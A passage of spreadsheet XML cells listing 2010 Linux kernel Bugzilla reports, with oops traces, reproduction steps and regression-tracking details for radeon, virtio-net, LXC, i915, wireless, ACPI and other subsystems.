    <t>Created attachment 28211 [details] Xorg log file Hi, With 2.6.35.2 (as packaged in Debian; I haven't tried 2.6.35.4, but as far as I can see it doesn't contain relevant changes), X fails to display; the kernel logs fills with repeats of the same Oops, copied below: [ 72.920167] BUG: unable to handle kernel NULL pointer dereference at (null) [ 72.920176] IP: [&lt;fab2a7a4&gt;] r600_ioctl_wait_idle+0x4f/0x98 [radeon] [ 72.920208] *pdpt = 000000003690d001 *pde = 0000000000000000 [ 72.920214] Oops: 0000 [#1] SMP [ 72.920218] last sysfs file: /sys/devices/pci0000:00/0000:00:1e.0/0000:02:0c.0/resource [ 72.920223] Modules linked in: binfmt_misc microcode fuse ext4 jbd2 crc16 sha256_generic aes_i586 aes_generic cbc iT CO_wdt iTCO_vendor_support tcp_diag inet_diag autofs4 loop grip w83627hf hwmon_vid dm_crypt snd_hda_codec_atihdmi cx227 02 cx88_dvb cx88_vp3054_i2c videobuf_dvb dvb_core snd_hda_intel rc_hauppauge_new snd_intel8x0 radeon snd_hda_codec tune r_simple tuner_types snd_ac97_codec snd_wavefront snd_cs4236 snd_usb_audio ac97_bus cx88_alsa snd_wss_lib snd_pcm_oss s nd_opl3_lib snd_mixer_oss snd_hwdep snd_usbmidi_lib snd_mpu401 snd_mpu401_uart btusb tuner joydev snd_seq_midi snd_pcm ttm bluetooth snd_rawmidi usblp rfkill hid_logitech cx8800 pwc ir_sony_decoder cx8802 snd_seq_midi_event ff_memless ir_ jvc_decoder cx88xx drm_kms_helper snd_seq ir_rc6_decoder ir_rc5_decoder ir_nec_decoder v4l2_common ir_common snd_timer snd_seq_device ir_core videodev drm v4l1_compat evdev tveeprom videobuf_dma_sg videobuf_core btcx_risc parport_pc i2c_a lgo_bit tpm_tis snd i2c_i801 ns558 parport psmouse tpm gameport shpchp tpm_bios serio_raw processor rng_core i2c_core p cspkr soundcore button pci_hotplug snd_page_alloc ext3 jbd mbcache dm_mod raid1 raid0 md_mod usbhid hid sg sr_mod sd_mo d cdrom crc_t10dif ata_generic uhci_hcd ata_piix libata aic7xxx ehci_hcd aic79xx 3w_xxxx scsi_transport_spi usbcore scs i_mod firewire_ohci floppy firewire_core thermal skge crc_itu_t thermal_sys nls_base [last unloaded: scsi_wait_scan] [ 72.920354] [ 72.920359] Pid: 3603, comm: Xorg Not tainted 2.6.35-trunk-686-bigmem #1 P4P800/To Be Filled By O.E.M. [ 72.920363] EIP: 0060:[&lt;fab2a7a4&gt;] EFLAGS: 00013246 CPU: 0 [ 72.920383] EIP is at r600_ioctl_wait_idle+0x4f/0x98 [radeon] [ 72.920386] EAX: 00000000 EBX: f62109c0 ECX: faf80000 EDX: 00000000 [ 72.920389] ESI: f6026600 EDI: 00000000 EBP: f63abe84 ESP: f63abe5c [ 72.920392] DS: 007b ES: 007b FS: 00d8 GS: 00e0 SS: 0068 [ 72.920396] Process Xorg (pid: 3603, ti=f63aa000 task=f6508840 task.ti=f63aa000) [ 72.920399] Stack: [ 72.920401] f62109c0 fab0dc33 f6a4c580 f64ae000 00000064 f90709f4 c0086464 fab697d4 [ 72.920409] &lt;0&gt; fab0dbf0 bfb84228 00000001 00000000 00000000 00000000 00004000 00000000 [ 72.920417] &lt;0&gt; 00000000 00000001 c10906aa f6a4c280 c10909e6 c143d4c0 c10265c2 fffff000 [ 72.920427] Call Trace: [ 72.920451] [&lt;fab0dc33&gt;] ? radeon_gem_wait_idle_ioctl+0x43/0x50 [radeon] [ 72.920472] [&lt;f90709f4&gt;] ? drm_ioctl+0x1e6/0x2aa [drm] [ 72.920494] [&lt;fab0dbf0&gt;] ? radeon_gem_wait_idle_ioctl+0x0/0x50 [radeon] [ 72.920503] [&lt;c10906aa&gt;] ? lock_page+0x8/0x1d [ 72.920507] [&lt;c10909e6&gt;] ? filemap_fault+0xb9/0x2ef [ 72.920514] [&lt;c10265c2&gt;] ? kmap_atomic_prot+0xcb/0xe7 [ 72.920518] [&lt;c102645c&gt;] ? kunmap_atomic+0x48/0x57 [ 72.920525] [&lt;c10a29fc&gt;] ? __do_fault+0x3f8/0x42e [ 72.920540] [&lt;f907080e&gt;] ? drm_ioctl+0x0/0x2aa [drm] [ 72.920546] [&lt;c10c6596&gt;] ? vfs_ioctl+0x1c/0x7d [ 72.920550] [&lt;c10c6b0e&gt;] ? do_vfs_ioctl+0x472/0x4ac [ 72.920555] [&lt;c10a70a2&gt;] ? mmap_region+0x342/0x415 [ 72.920559] [&lt;c10c6b8c&gt;] ? sys_ioctl+0x44/0x64 [ 72.920564] [&lt;c1007cdf&gt;] ? sysenter_do_call+0x12/0x28 [ 72.920566] Code: 00 76 10 8b 88 9c 00 00 00 31 c0 89 81 34 2f 00 00 eb 18 8b 98 9c 00 00 00 b9 34 2f 00 00 89 0b 8b 88 9c 00 00 00 31 c0 89 41 04 &lt;8b&gt; 02 eb 43 83 b8 98 00 00 00 00 77 0c 81 b8 94 00 00 00 80 54 [ 72.920619] EIP: [&lt;fab2a7a4&gt;] r600_ioctl_wait_idle+0x4f/0x98 [radeon] SS:ESP 0068:f63abe5c [ 72.920641] CR2: 0000000000000000 [ 72.920645] ---[ end trace 57bf3e55b0124490 ]--- [ 72.921123] [drm:drm_release] *ERROR* Device busy: 1 I'm also attaching the Xorg.log. I've got a rather unusual system, running a Pentium 4 (32-bit only) with 3GB of RAM and an AGP HD 4650 with 1GB of VRAM; the AGP aperture is only 32MB because Linux fails to boot with anything larger. Regards, Stephen</t>
  </si>
  <si>
    <t>instant crash (jump to NULL) with virtio-net, tap, bridge and veth</t>
  </si>
  <si>
    <t>2010-08-29 08:29 UTC</t>
  </si>
  <si>
    <t>2012-05-12 16:03 UTC</t>
  </si>
  <si>
    <t>This has been sent to lkml, linux-netdev and kvm mailinglists, but generated zero interest. Submitting to bugzilla. Since it involves several components, but most of them are networking, I'm filing it against Networking/Other category. It also applies to virtualisation. Hello. I'm seeing instant host kernel crash triggered by _any_ network activity to/from a kvm guest that's using virtio-net. My setup is maybe a bit unusual, but here we go. I've a host machine that has one bridge configured, and is running a few kvm virtual machines and a few linux containers (LXC). All the guests/containers are "connected" to that single bridge - guests using tap devices, lxc containers using veth devices. Host eth0 is connected to the same bridge as well. The problem happens with virtio-net drivers used in guest (this is windowsXP virtual machine with latest netkvm driver from alt.fedoraproject.org), when I connect to that guest from an LXC container. I.e, when packet goes lxc =&gt; veth =&gt; bridge =&gt; tun =&gt; kvm =&gt; virtio in guest (or back). When I connect to the same guest from _host_, it all works as expected. When I change (virtual) NIC in guest to e1000 or older (from 2009) virtio-net driver, it works. When I connect from lxc container to a linux guest with latest virtio-net drivers, it all works as expected too. So only one combination so far that triggers the issue. This is all with 2.6.32 kernel. Initially it was 2.6.32.15, but 2.6.32.20 behaves the same way too. All 64bit. Also it does NOT happen with 2.6.35.3, the current latest released kernel. Here's one of captured OOPSes (i did it several times, but they were incomplete): console [netcon0] enabled netconsole: network logging started BUG: unable to handle kernel NULL pointer dereference at (null) IP: [&lt;(null)&gt;] (null) PGD 177bf2067 PUD 177ae5067 PMD 0 Oops: 0010 [#1] SMP last sysfs file: /sys/devices/virtual/block/md8/md/mismatch_cnt CPU 0 Modules linked in: netconsole configfs squashfs kvm_amd kvm veth autofs4 bridge quota_v2 quota_tree ext4 jbd2 crc16 raid0 raid456 async_pq async_xor xor async_memcpy async_raid6_recov raid6_pq async_tx loop sr_mod cdrom tun powernow_k8 processor thermal_sys 8021q garp stp llc asus_atk0110 hwmon atl1 mii ext3 jbd mbcache raid1 md_mod pata_atiixp ehci_hcd ohci_hcd usbcore nls_base ahci libata sd_mod scsi_mod Pid: 2345, comm: kvm Not tainted 2.6.32-amd64 #2.6.32.20 System Product Name RIP: 0010:[&lt;0000000000000000&gt;] [&lt;(null)&gt;] (null) RSP: 0018:ffff880028203e70 EFLAGS: 00010293 RAX: ffff880179480ec0 RBX: ffff8801a07770c0 RCX: 0000000000000000 RDX: 0000000000000000 RSI: ffff8801a07770c0 RDI: ffff8801a07770c0 RBP: ffff880124b89030 R08: ffffffff8125fab0 R09: ffff880028203e40 R10: 0000000000000000 R11: 0000000000000000 R12: ffff880028210888 R13: ffff880028210880 R14: 000000010000e60f R15: 0000000000000040 FS: 00007fe2da5e5700(0000) GS:ffff880028200000(0000) knlGS:00000000f74a59d0 CS: 0010 DS: 0000 ES: 0000 CR0: 000000008005003b CR2: 0000000000000000 CR3: 0000000177a8a000 CR4: 00000000000006f0 DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400 Process kvm64 (pid: 2345, threadinfo ffff880177be2000, task ffff880177a7c0c0) Stack: ffffffff8125fbd5 0000000000000040 ffffffff8126013c 0000000080000000 &lt;0&gt; ffff8800282108b8 0000000000000002 ffff880028210888 ffff880028210880 &lt;0&gt; ffffffff81236276 ffff880028203f48 ffff8800282108b8 0000000000000000 Call Trace: &lt;IRQ&gt; [&lt;ffffffff8125fbd5&gt;] ? ip_rcv_finish+0x125/0x430 [&lt;ffffffff8126013c&gt;] ? ip_rcv+0x25c/0x350 [&lt;ffffffff81236276&gt;] ? process_backlog+0x76/0xd0 [&lt;ffffffff81236a18&gt;] ? net_rx_action+0xf8/0x1f0 [&lt;ffffffff81059120&gt;] ? __do_softirq+0xb0/0x1d0 [&lt;ffffffff8100c56c&gt;] ? call_softirq+0x1c/0x30 &lt;EOI&gt; [&lt;ffffffff8100e595&gt;] ? do_softirq+0x65/0xa0 [&lt;ffffffff81236b2e&gt;] ? netif_rx_ni+0x1e/0x30 [&lt;ffffffffa014e97a&gt;] ? tun_chr_aio_write+0x35a/0x510 [tun] [&lt;ffffffffa014e620&gt;] ? tun_chr_aio_write+0x0/0x510 [tun] [&lt;ffffffff810ffea4&gt;] ? do_sync_readv_writev+0xd4/0x110 [&lt;ffffffff8106e890&gt;] ? autoremove_wake_function+0x0/0x30 [&lt;ffffffff81071709&gt;] ? enqueue_hrtimer+0x79/0xc0 [&lt;ffffffff810ffd08&gt;] ? rw_copy_check_uvector+0x88/0x110 [&lt;ffffffff811005bc&gt;] ? do_readv_writev+0xdc/0x220 [&lt;ffffffff8106dafc&gt;] ? sys_timer_settime+0x13c/0x2e0 [&lt;ffffffff8110084e&gt;] ? sys_writev+0x4e/0x90 [&lt;ffffffff8100b482&gt;] ? system_call_fastpath+0x16/0x1b Code: Bad RIP value. RIP [&lt;(null)&gt;] (null) RSP &lt;ffff880028203e70&gt; CR2: 0000000000000000 ---[ end trace 1dcd3c52bde0fa25 ]--- Kernel panic - not syncing: Fatal exception in interrupt Pid: 2345, comm: kvm Tainted: G D 2.6.32-amd64 #2.6.32.20 Call Trace: &lt;IRQ&gt; [&lt;ffffffff812c22de&gt;] ? panic+0x7a/0x134 [&lt;ffffffff812c23d8&gt;] ? printk+0x40/0x48 [&lt;ffffffff8100faa3&gt;] ? oops_end+0xa3/0xb0 [&lt;ffffffff8103138a&gt;] ? no_context+0xfa/0x260 [&lt;ffffffff812c52a5&gt;] ? page_fault+0x25/0x30 [&lt;ffffffff8125fab0&gt;] ? ip_rcv_finish+0x0/0x430 [&lt;ffffffff8125fbd5&gt;] ? ip_rcv_finish+0x125/0x430 [&lt;ffffffff8126013c&gt;] ? ip_rcv+0x25c/0x350 [&lt;ffffffff81236276&gt;] ? process_backlog+0x76/0xd0 [&lt;ffffffff81236a18&gt;] ? net_rx_action+0xf8/0x1f0 [&lt;ffffffff81059120&gt;] ? __do_softirq+0xb0/0x1d0 [&lt;ffffffff8100c56c&gt;] ? call_softirq+0x1c/0x30 &lt;EOI&gt; [&lt;ffffffff8100e595&gt;] ? do_softirq+0x65/0xa0 [&lt;ffffffff81236b2e&gt;] ? netif_rx_ni+0x1e/0x30 [&lt;ffffffffa014e97a&gt;] ? tun_chr_aio_write+0x35a/0x510 [tun] [&lt;ffffffffa014e620&gt;] ? tun_chr_aio_write+0x0/0x510 [tun] [&lt;ffffffff810ffea4&gt;] ? do_sync_readv_writev+0xd4/0x110 [&lt;ffffffff8106e890&gt;] ? autoremove_wake_function+0x0/0x30 [&lt;ffffffff81071709&gt;] ? enqueue_hrtimer+0x79/0xc0 [&lt;ffffffff810ffd08&gt;] ? rw_copy_check_uvector+0x88/0x110 [&lt;ffffffff811005bc&gt;] ? do_readv_writev+0xdc/0x220 [&lt;ffffffff8106dafc&gt;] ? sys_timer_settime+0x13c/0x2e0 [&lt;ffffffff8110084e&gt;] ? sys_writev+0x4e/0x90 [&lt;ffffffff8100b482&gt;] ? system_call_fastpath+0x16/0x1b Rebooting in 60 seconds.. Another: BUG: unable to handle kernel NULL pointer dereference at (null) IP: [&lt;(null)&gt;] (null) PGD 10c804067 PUD 212d0e067 PMD 0 Oops: 0010 [#1] SMP last sysfs file: /sys/devices/virtual/vc/vcsa2/dev CPU 0 Modules linked in: netconsole configfs squashfs kvm_amd kvm veth autofs4 bridge quota_v2 quota_tree ext4 jbd2 crc16 raid0 raid456 async_pq async_xor xor async_memcpy async_raid6_recov raid6_pq async_tx loop sr_mod cdrom tun powernow_k8 processor thermal_sys 8021q garp stp llc asus_atk0110 hwmon atl1 mii ext3 jbd mbcache raid1 md_mod pata_atiixp ehci_hcd ohci_hcd usbcore nls_base [&lt;ffffffff8100bff3&gt;] ? apic_timer_interrupt+0x13/0x20 [&lt;ffffffff8100fced&gt;] ? oops_end+0x9d/0xb0 [&lt;ffffffff810320b7&gt;] ? no_context+0xf7/0x260 [&lt;ffffffff81032375&gt;] ? __bad_area_nosemaphore+0x155/0x230 [&lt;ffffffffa0273ea0&gt;] ? br_nf_pre_routing_finish+0x0/0x350 [bridge] [&lt;ffffffffa0274759&gt;] ? br_nf_pre_routing+0x569/0x880 [bridge] [&lt;ffffffff812cc945&gt;] ? page_fault+0x25/0x30 [&lt;ffffffff812650a0&gt;] ? ip_rcv+0x0/0x350 [&lt;ffffffff81264c60&gt;] ? ip_rcv_finish+0x0/0x440 [&lt;ffffffff81264e19&gt;] ? ip_rcv_finish+0x1b9/0x440 [&lt;ffffffff81265354&gt;] ? ip_rcv+0x2b4/0x350 [&lt;ffffffff8123ba85&gt;] ? process_backlog+0x75/0xc0 [&lt;ffffffff8123c246&gt;] ? net_rx_action+0x106/0x220 [&lt;ffffffff8105abcb&gt;] ? __do_softirq+0xfb/0x1d0 [&lt;ffffffff8100c62c&gt;] ? call_softirq+0x1c/0x30 &lt;EOI&gt; [&lt;ffffffff8100e765&gt;] ? do_softirq+0x65/0xa0 [&lt;ffffffff8123c379&gt;] ? netif_rx_ni+0x19/0x20 [&lt;ffffffffa0151b0b&gt;] ? tun_chr_aio_write+0x3fb/0x550 [tun] [&lt;ffffffffa0151710&gt;] ? tun_chr_aio_write+0x0/0x550 [tun] [&lt;ffffffff811031fb&gt;] ? do_sync_readv_writev+0xcb/0x110 [&lt;ffffffff81065941&gt;] ? __dequeue_signal+0xe1/0x210 [&lt;ffffffff810706b0&gt;] ? autoremove_wake_function+0x0/0x30 [&lt;ffffffff81012bc2&gt;] ? read_tsc+0x12/0x40 [&lt;ffffffff81024608&gt;] ? lapic_next_event+0x18/0x20 [&lt;ffffffff8107d156&gt;] ? tick_dev_program_event+0x36/0xb0 [&lt;ffffffff81103036&gt;] ? rw_copy_check_uvector+0x86/0x130 [&lt;ffffffff81103912&gt;] ? do_readv_writev+0xe2/0x230 [&lt;ffffffff8106f883&gt;] ? sys_timer_settime+0x153/0x350 [&lt;ffffffff81103bb3&gt;] ? sys_writev+0x53/0xa0 [&lt;ffffffff8100b542&gt;] ? system_call_fastpath+0x16/0x1b Rebooting in 60 seconds.. I looked at the changes in tun, virtio-net, bridge code and veth between 2.6.32 and 2.6.35, but I see nothing relevant in there (but I'm not an expert in that area anyway). The changes mentions a few crashes, but all were related to device registration/deregistration or module unload, not to normal send/receive path. So the fact that it works for 2.6.35 is, well, suspicious. There's a real bug somewhere, but apparently it's not fixed but masked in 2.6.35, masked by some other change around... Thanks! /mjt</t>
  </si>
  <si>
    <t>[lxc] gdb cannot debug bash properly in an LXC container</t>
  </si>
  <si>
    <t>2010-08-29 09:35 UTC</t>
  </si>
  <si>
    <t>Robin Green</t>
  </si>
  <si>
    <t>2011-01-24 12:41 UTC</t>
  </si>
  <si>
    <t>(I couldn't find a kernel bugzilla component for LXC bugs, so I picked something that sounded vaguely related.) gdb is unable to debug bash once the command "ls" is typed in, but only inside an LXC container (outside the container, it works). The error message from gdb is: Couldn't write debug register: No such process Steps to Reproduce: 1. Set up an LXC chroot containing gdb and bash (on Fedora Linux, this can be done fairly easily by installing and configuring mach and then using "mach yum install gdb bash". mach also supports apt-get.) I also installed the separate -debuginfo packages inside the container, but I don't think this matters. 2. I use the libvirt command-line tools to actually start the LXC container, because I couldn't manage to get the LXC userspace tools to create a container. Define the LXC chroot in virsh, e.g. virsh define foo.xml for some libvirt configuration file foo.xml 3. virsh --connect lxc:/// start foo &amp;&amp; virsh --connect lxc:/// console foo 4. export PATH=/usr/bin:$PATH 5. gdb /bin/bash 6. Type 'r' to run bash 7. Inside that bash process, type 'ls' and hit the enter key At this point it says Couldn't write debug register: No such process FYI, I get a slightly different error message if I use the Fedora kernel instead of the mainline kernel: Waiting for child: no such process Regarding the regression flag: I am *guessing* this is a regression, because the very similar bug that I just mentioned in the Fedora kernel tree is definitely a regression. I plan to test older and newer mainline kernel versions at a later date.</t>
  </si>
  <si>
    <t>i915: 2.6.36-rc2 wrong resolution on gdm start</t>
  </si>
  <si>
    <t>2010-08-29 12:58 UTC</t>
  </si>
  <si>
    <t>2010-09-11 09:42 UTC</t>
  </si>
  <si>
    <t>Subject : i915: 2.6.36-rc2 wrong resolution on gdm start Submitter : Ivan Bulatovic &lt;combuster@gmx.com&gt; Date : 2010-08-24 1:00 Message-ID : 1282611655.2177.19.camel@localhost.localdomain References : http://marc.info/?l=linux-kernel&amp;m=128261168202306&amp;w=2 Handled-By : Chris Wilson &lt;chris@chris-wilson.co.uk&gt; This entry is being used for tracking a regression from 2.6.35. Please don't close it until the problem is fixed in the mainline. Caused by: commit 9d0498a2bf7455159b317f19531a3e5db2ecc9c4 Author: Jesse Barnes &lt;jbarnes@virtuousgeek.org&gt; Date: Wed Aug 18 13:20:54 2010 -0700 drm/i915: wait for actual vblank, not just 20ms Waiting for a hard coded 20ms isn't always enough to make sure a vblank period has actually occurred, so add code to make sure we really have passed through a vblank period (or that the pipe is off when disabling). This prevents problems with mode setting and link training, and seems to fix a bug like https://bugs.freedesktop.org/show_bug.cgi?id=29278, but on an HP 8440p instead. Hopefully also fixes https://bugs.freedesktop.org/show_bug.cgi?id=29141. Signed-off-by: Jesse Barnes &lt;jbarnes@virtuousgeek.org&gt; Signed-off-by: Eric Anholt &lt;eric@anholt.net&gt; First-Bad-Commit : 9d0498a2bf7455159b317f19531a3e5db2ecc9c4</t>
  </si>
  <si>
    <t>2.6.36-rc2-git4 - INFO: possible circular locking dependency detected</t>
  </si>
  <si>
    <t>2.6.36-rc2-git4</t>
  </si>
  <si>
    <t>2010-08-29 13:52 UTC</t>
  </si>
  <si>
    <t>2010-09-15 18:14 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.36-rc2-git4 - INFO: possible circular locking dependency detected Submitter : Miles Lane &lt;miles.lane@gmail.com&gt; Date : 2010-08-27 1:56 Message-ID : AANLkTinHbEW36D5R9NSrGgfbOC0Hri3Tg-fA0iR92Udi@mail.gmail.com References : http://marc.info/?l=linux-kernel&amp;m=128287422106267&amp;w=2 This entry is being used for tracking a regression from 2.6.35. Please don't close it until the problem is fixed in the mainline. Caused by: commit 5a652052fedbd7869572c757dd2ffc2ed420c69d Author: Maxime Bizon &lt;mbizon@freebox.fr&gt; Date: Wed Jul 21 17:21:38 2010 +0200 cfg80211: fix race between sysfs and cfg80211 First-Bad-Commit : 5a652052fedbd7869572c757dd2ffc2ed420c69d</t>
  </si>
  <si>
    <t>kdump regression compared to v2.6.35</t>
  </si>
  <si>
    <t>2010-08-29 14:11 UTC</t>
  </si>
  <si>
    <t>2010-09-21 00:22 UTC</t>
  </si>
  <si>
    <t>Subject : kdump regression compared to v2.6.35 Submitter : CAI Qian &lt;caiqian@redhat.com&gt; Date : 2010-08-27 12:35 Message-ID : 2136707099.1405541282912500148.JavaMail.root@zmail06.collab.prod.int.phx2.redhat.com References : http://marc.info/?l=linux-kernel&amp;m=128291252612135&amp;w=2 This entry is being used for tracking a regression from 2.6.35. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Module intel-agp causes page fault</t>
  </si>
  <si>
    <t>2010-08-29 23:20 UTC</t>
  </si>
  <si>
    <t>Sebastian Herbst</t>
  </si>
  <si>
    <t>2012-04-18 21:32 UTC</t>
  </si>
  <si>
    <t>Whenever intel-agp is loaded (via udev or manually using insmod) the kernel is trapped with a page fault. Unfortunately I have no idea how to save the sometimes showing stack backtrace into a file. Compiling the module statically into the kernel causes to immediately crash the kernel when it's loaded. My hardware is Lenovo X300. The affected configs are attached to this bug report. If you need further information on this issue, I'll be happy to supply it here.</t>
  </si>
  <si>
    <t>stable regression from 2.6.35.1: After uncompressing the kernel, at boot time, the server hangs.</t>
  </si>
  <si>
    <t>2010-08-30 09:06 UTC</t>
  </si>
  <si>
    <t>2010-09-17 19:53 UTC</t>
  </si>
  <si>
    <t>In Bug #16173 Guan Xin reported a stable regression: &gt; Comment #33 From Guan Xin 2010-08-16 01:27:15 (-) [reply] ------- &gt; &gt; This problem did not occur to me at 2.6.35.1. It's new to me at 2.6.35.2. &gt; &gt; UP: &gt; vendor_id : GenuineIntel &gt; cpu family : 6 &gt; model : 13 &gt; model name : Intel(R) Pentium(R) M processor 1.60GHz &gt; stepping : 8 &gt; &gt; Comment #34 From Guan Xin 2010-08-16 01:35:50 (-) [reply] ------- &gt; &gt; Created an attachment (id=27457) [details] &gt; config with which the problem can be reproduced on ThinkPad T43 1871-FU1 1.5GB &gt; Mem with 2.6.35.2 &gt;</t>
  </si>
  <si>
    <t>Unable to set txpower on rt2860 mini-pci wifi card</t>
  </si>
  <si>
    <t>2010-08-30 19:20 UTC</t>
  </si>
  <si>
    <t>jd1008</t>
  </si>
  <si>
    <t>2010-09-13 19:34 UTC</t>
  </si>
  <si>
    <t>wifi card: Sparklan wmir-200N http://www.sparklan.com/product.php?func=view&amp;prod_id=43 Chipset: RT2860/RT2850 The Datasheet says: Output Power 802.11a: 12.5dBm ± 1.5dBm 802.11b: 17dBm ± 1.5dBm 802.11g: 14dBm ± 1.5dBm 802.11an: 14dBm ± 1.5dBm 802.11gn: 14dBm ± 1.5dBm I am running in g mode (54megabits/s) $ sudo iwconfig wlan0 wlan0 IEEE 802.11abgn ESSID:"Deleted" Mode:Managed Frequency:2.462 GHz Access Point: aa:bb:cc:dd:ee:ff Bit Rate=54 Mb/s Tx-Power=8 dBm &lt;&lt;&lt;===== Retry long limit:7 RTS thr:off Fragment thr:off Encryption key:off Power Management:on Link Quality=70/70 Signal level=58 dBm Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0 Tx excessive retries:0 Invalid misc:0 Missed beacon:0 I tried to set txpower to 14 per datasheet spec: $ sudo iwconfig wlan0 txpower 14dBm Error for wireless request "Set Tx Power" (8B26) : SET failed on device wlan0 ; Invalid argument. The drivers that are loaded for this wifi card are: rt2800pci 7931 0 rt2800lib 27818 1 rt2800pci rt2x00pci 5799 1 rt2800pci rt2x00lib 25936 3 rt2800pci,rt2800lib,rt2x00pci mac80211 182154 2 rt2x00pci,rt2x00lib cfg80211 135626 2 rt2x00lib,mac80211 eeprom_93cx6 1305 1 rt2800pci crc_ccitt 1311 2 rt2800pci,irda Either wext driver or the rt2xxx drivers are causing this. Setting txpower to a low value of 8 works find - but that is too feeble and causes the card to disconnect and reconnect.</t>
  </si>
  <si>
    <t>lm_sensors returns wrong CPU temperature values with k8temp</t>
  </si>
  <si>
    <t>2010-09-03 11:07 UTC</t>
  </si>
  <si>
    <t>mkkot</t>
  </si>
  <si>
    <t>2010-09-25 11:43 UTC</t>
  </si>
  <si>
    <t>Created attachment 28942 [details] dmesg I kindly ask for indulgence as this is my first bugreport here. I have a Gigabyte M61P-S3 motherboard with an AMD CPU installed: model name : AMD Athlon(tm) 64 X2 Dual Core Processor 5600+ I use cpu scaling feature if this matters (powernow-k8 cpufreq_ondemand). After recent kernel update (using Archlinux 64 bit packages): [2010-09-01 11:01] upgraded kernel26 (2.6.34.1-1 -&gt; 2.6.35.4-1) my plasmoid which measures CPU core temperatures started to display very lowered values. After some digging I found it is probably using lm_sensors, which reports bad values as well: [root@linux mk]# sensors k8temp-pci-00c3 Adapter: PCI adapter Core0 Temp: +5.0°C Core0 Temp: +6.0°C Core1 Temp: +7.0°C Core1 Temp: +2.0°C [root@linux mk]# I should have there at least 27°C. I use a standard often updated Archlinux system with no stange configuration or devices attached. Probably a dmesg output can tell you more.</t>
  </si>
  <si>
    <t>2.6.36-rc3: WARNING: at net/mac80211/scan.c:269 ieee80211_scan_completed</t>
  </si>
  <si>
    <t>2.6.36-rc3</t>
  </si>
  <si>
    <t>2010-09-03 18:41 UTC</t>
  </si>
  <si>
    <t>2010-11-16 14:36 UTC</t>
  </si>
  <si>
    <t>18692 18992</t>
  </si>
  <si>
    <t>Subject : 2.6.36-rc3: WARNING: at net/mac80211/scan.c:269 ieee80211_scan_completed Submitter : Thomas Meyer &lt;thomas@m3y3r.de&gt; Date : 2010-08-31 20:14 Message-ID : 201008312214.52473.thomas@m3y3r.de References : http://marc.info/?l=linux-kernel&amp;m=128328580504227&amp;w=2 This entry is being used for tracking a regression from 2.6.35. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>[2.6.35.x regression] rcu_preempt_state stall warning and machine slow-downs</t>
  </si>
  <si>
    <t>2010-09-03 18:48 UTC</t>
  </si>
  <si>
    <t>2010-09-26 20:29 UTC</t>
  </si>
  <si>
    <t>Subject : [2.6.35.x regression] rcu_preempt_state stall warning and machine slow-downs Submitter : Matthias Dahl &lt;ml_kernel@mortal-soul.de&gt; Date : 2010-09-01 6:47 Message-ID : 201009010847.20236.ml_kernel@mortal-soul.de References : http://marc.info/?l=linux-kernel&amp;m=128332418629305&amp;w=2 This entry is being used for tracking a regression from 2.6.34. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>2.6.36-rc2-git5: Oops in snd_pcm_substream_proc_status_read()</t>
  </si>
  <si>
    <t>2.6.36-rc2-git5</t>
  </si>
  <si>
    <t>2010-09-03 19:03 UTC</t>
  </si>
  <si>
    <t>2010-09-20 18:59 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.36-rc2-git5: Oops in snd_pcm_substream_proc_status_read() Submitter : Chuck Ebbert &lt;cebbert@redhat.com&gt; Date : 2010-09-01 8:19 Message-ID : 20100901041924.23a8a865@katamari References : http://marc.info/?l=linux-kernel&amp;m=128332930703451&amp;w=2 This entry is being used for tracking a regression from 2.6.35. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>bdi-default hung waiting for kthread_stop to finish</t>
  </si>
  <si>
    <t>2010-09-06 18:15 UTC</t>
  </si>
  <si>
    <t>2010-09-19 19:32 UTC</t>
  </si>
  <si>
    <t>Subject : bdi-default hung waiting for kthread_stop to finish Submitter : Jeff Layton &lt;jlayton@redhat.com&gt; Date : 2010-09-02 18:55 Message-ID : 20100902145509.28e4f998@tlielax.poochiereds.net References : http://marc.info/?l=linux-kernel&amp;m=128345371904504&amp;w=2 This entry is being used for tracking a regression from 2.6.35. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>PM1a registers in MMIO space causes panic</t>
  </si>
  <si>
    <t>2010-09-07 20:30 UTC</t>
  </si>
  <si>
    <t>2011-01-18 05:03 UTC</t>
  </si>
  <si>
    <t>Myron Stowe</t>
  </si>
  <si>
    <t>The acpi_irq() path reads the PM1a registers. These registers are in I/O port space on most machines, and there's no problem in that case. But these registers may be in MMIO space instead, and in that case, we use acpi_os_read_memory(), which is not safe in interrupt context because it depends on ioremap(), which may allocate memory. Here's a stacktrace from such a machine (this is a prototype, and I can't supply any details about it): kernel BUG at .../mm/vmalloc.c:1226! invalid opcode: 0000 [#1] SMP Pid: 1, comm: swapper Tainted: G M 2.6.35-06116-g73f44ba-dirty #9 Call Trace: [&lt;ffffffff810cb575&gt;] get_vm_area_caller+0x39/0x3b [&lt;ffffffff81026f76&gt;] __ioremap_caller+0x250/0x2ee [&lt;ffffffff8102709d&gt;] ioremap_nocache+0x12/0x14 [&lt;ffffffff8121b003&gt;] acpi_os_read_memory+0x17/0x61 [&lt;ffffffff81237775&gt;] acpi_hw_read+0x4c/0xc3 [&lt;ffffffff81237816&gt;] acpi_hw_read_multiple+0x2a/0x63 [&lt;ffffffff81237a40&gt;] acpi_hw_register_read+0x53/0xe3 [&lt;ffffffff8122bda9&gt;] acpi_ev_fixed_event_detect+0x31/0xfe [&lt;ffffffff8122cb1c&gt;] acpi_ev_sci_xrupt_handler+0xf/0x22 [&lt;ffffffff8121a30d&gt;] acpi_irq+0x11/0x2c [&lt;ffffffff81086c87&gt;] handle_IRQ_event+0x58/0x130 [&lt;ffffffff81088900&gt;] handle_fasteoi_irq+0x8c/0xc7 [&lt;ffffffff81004f2e&gt;] handle_irq+0x86/0x90</t>
  </si>
  <si>
    <t>No sound on headphone jack</t>
  </si>
  <si>
    <t>2010-09-07 21:45 UTC</t>
  </si>
  <si>
    <t>2010-09-30 06:35 UTC</t>
  </si>
  <si>
